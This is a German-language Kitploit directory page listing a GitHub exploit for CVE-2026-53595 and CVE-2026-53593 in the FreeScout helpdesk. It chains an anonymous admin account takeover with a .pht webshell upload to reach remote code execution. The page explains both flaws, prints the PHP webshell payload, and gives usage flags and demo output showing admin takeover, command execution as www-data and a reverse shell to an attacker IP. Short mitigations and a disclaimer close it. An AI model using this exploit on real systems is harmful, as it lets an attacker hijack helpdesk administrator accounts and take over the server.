Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-53595_exploit | Kitploit
Tools/GitHubGitHub/0xdak/cve-2026-53595_exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRed Teaming
GitHub0xdak/cve-2026-53595_exploit

CVE-2026-53595_exploit

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-53595 (+ CVE-2026-53593) — FreeScout Anonyme Kontoübernahme → RCE

Nicht authentifizierte Remote-Codeausführung in FreeScout ≤ 1.8.223 (ein Laravel-Helpdesk) durch Verkettung zweier Schwachstellen, die beide in 1.8.224 behoben wurden:

  • CVE-2026-53595 — anonyme Kontoübernahme. POST /user-setup/{hash}/{invite_sent_at} wählt das Konto nur anhand seiner Spalte invite_hash aus. Ein aktivierter Benutzer hat invite_hash = '', und bei MySQL/MariaDB ignoriert die Gleichheit von VARCHAR nachgestellte Leerzeichen, sodass hash = %20 auf den Administrator passt. Die Ablaufprüfung von invite_sent_at entschlüsselt den Wert mit dem Passwort des Benutzers als Schlüssel, aber der Entschlüsselungs-Helper gibt bei einem Fehler die Roheingabe zurück (leeres catch), sodass ein aktueller Unix-Zeitstempel im Klartext akzeptiert wird. Der Endpunkt überschreibt anschließend E-Mail und Passwort des Kontos und meldet dich an.
  • CVE-2026-53593 — authentifizierter .pht-Upload. Die Upload-Denylist (php.*|sh|pl|phtml|phar) deckt .pht nicht ab, das Apache mod_php als PHP ausführt.

Durch die Verkettung beider erlangt ein nicht authentifizierter Angreifer Codeausführung als Webserver-Benutzer (www-data).

Was es tut

  1. GET /user-setup/%20/<unix_ts> aufrufen, um ein Session-Cookie + CSRF-Token zu erhalten.
  2. Dieselbe URL per POST aufrufen, um E-Mail/Passwort des Administrators zu überschreiben und sich anzumelden (ATO).
  3. Eine shell.pht per POST /uploads/upload hochladen (<?php system($_GET['c']); ?>).
  4. Einen Befehl über die Webshell ausführen oder eine Reverse Shell öffnen.

Verwendung

root@kitploit:~
./exploit.sh -t <target> [options]
   -t, --target URL     target base URL (e.g. http://10.10.10.10)   [required]
   -c, --cmd CMD        run a single command (default: id)
       --lhost IP       reverse shell: attacker IP (start nc first)
       --lport PORT     reverse shell port (default 4444)
       --email ADDR     email to set on the seized admin (default [email protected])
       --password PASS  password to set (default Pwned12345)
   -h, --help

Demo

root@kitploit:~
$ ./exploit.sh -t http://10.10.10.10
[*] fetching setup form (hash=%20, ts=1784500000) ...
[*] seizing admin -> [email protected] / Pwned12345 ...
[+] admin account taken over (you can also log in at http://10.10.10.10/login)
[*] uploading .pht webshell ...
[+] webshell: http://10.10.10.10/storage/uploads/p2Bj81XDu6DbBJ4Sq5mYW05zY.pht
[+] id -> uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ ./exploit.sh -t http://10.10.10.10 -c 'cat /var/www/local.txt'
...
[+] cat /var/www/local.txt -> f1a7c30e9b6d24851e6d24851f1a7c30

# reverse shell (run `nc -lvnp 4444` first)
$ ./exploit.sh -t http://10.10.10.10 --lhost 10.10.14.7 --lport 4444
[+] admin account taken over ...
[+] webshell: http://10.10.10.10/storage/uploads/....pht
[*] sending reverse shell to 10.10.14.7:4444 ...
[+] payload sent — check your listener.

Voraussetzungen

  • bash, curl, jq

Hinweise

  • Funktioniert mit FreeScout 1.0.x – 1.8.223; 1.8.224+ behebt beide Fehler (aus 302 wird eine fehlgeschlagene Übernahme).
  • Die RCE greift als www-data (Apache-Benutzer) durch. Die Ausführung von .pht hängt davon ab, dass der Server .pht über mod_php ausführt — die Umgebung "Standard Apache + libapache2-mod-php", auf die die CVE abzielt.
  • Die Reverse Shell wird base64-kodiert, bevor sie die Webshell erreicht: system() läuft über /bin/sh (dash auf Debian/Ubuntu), das die nur in Bash verfügbare Umleitung >& /dev/tcp/... nicht versteht, und base64 umgeht außerdem alle Anführungszeichen-Fallstricke.
  • Das Standardpasswort enthält absichtlich kein ! — ! löst in interaktiven bash/zsh-Shells die Historie-Expansion aus und verstümmelt eingefügte Befehle.

Gegenmaßnahmen

  • Upgrade auf FreeScout 1.8.224+ durchführen.
  • Niemals VARCHAR-Gleichheit für Sicherheits-Tokens verwenden (Kollisionen durch nachgestellte Leerzeichen) und eine fehlgeschlagene Entschlüsselung niemals als gültigen Wert behandeln — leere/ungültige Tokens ablehnen.
  • Eine Upload-Allowlist verwenden, Uploads außerhalb des Web-Roots speichern und sie über einen Handler bereitstellen, der sie niemals ausführt.

Haftungsausschluss

Nur für autorisierte Sicherheitstests und zu Bildungszwecken. Verwende es nicht gegen Systeme, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast. Der Autor übernimmt keine Haftung für Missbrauch.

Tool herunterladen